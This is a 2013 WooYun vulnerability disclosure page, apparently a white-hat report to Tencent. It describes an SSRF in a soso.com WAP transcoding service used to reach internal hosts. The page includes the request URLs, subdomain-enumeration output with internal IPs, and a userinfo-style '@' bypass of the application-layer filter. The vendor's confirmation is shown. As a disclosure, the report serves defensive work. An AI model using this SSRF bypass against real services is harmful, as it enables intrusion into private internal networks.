当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026212

漏洞标题:我是如何漫游腾讯内部网络的

相关厂商:腾讯

漏洞作者: 结界师

提交时间:2013-06-18 13:35

修复时间:2013-08-02 13:36

公开时间:2013-08-02 13:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-18: 细节已通知厂商并且等待厂商处理中
2013-06-18: 厂商已经确认,细节仅向厂商公开
2013-06-28: 细节向核心白帽子及相关领域专家公开
2013-07-08: 细节向普通白帽子公开
2013-07-18: 细节向实习白帽子公开
2013-08-02: 细节向公众公开

简要描述:

通过一些小的安全漏洞加上一些网络设计的不合理和安全边界的缺失是可以遍历腾讯内部网络的

详细说明:

http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://www.wooyun.org


是可以有转码服务的

----------------------------------------------------------------------------
[+] Start host verifying. Please wait...
----------------------------------------------------------------------------
[+] Find admin.soso.com
 |       10.130.74.19
[+] Find ads.soso.com
 |       124.89.31.177
 |       124.89.102.66
[+] Find app.soso.com
 |       61.135.167.96
[+] Find auto.soso.com
 |       124.115.14.19
[+] Find b.soso.com
 |       61.135.167.27
[+] Find blog.soso.com
 |       124.89.102.138
[+] Find bm.soso.com


是可以弄到内网域名和ip的

http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://admin.soso.com


soso1.png


http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://10.130.74.19


soso2.png


有限制哦,但是是应用层的不是网络层的,明显不合理

http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://w@w:10.130.74.19


绕过

漏洞证明:

soso3.png


soso4.png


soso5.png


soso6.png


soso7.png


soso8.png


soso9.png

修复方案:

发200只公仔

版权声明:转载请注明来源 结界师@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-06-18 14:43

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无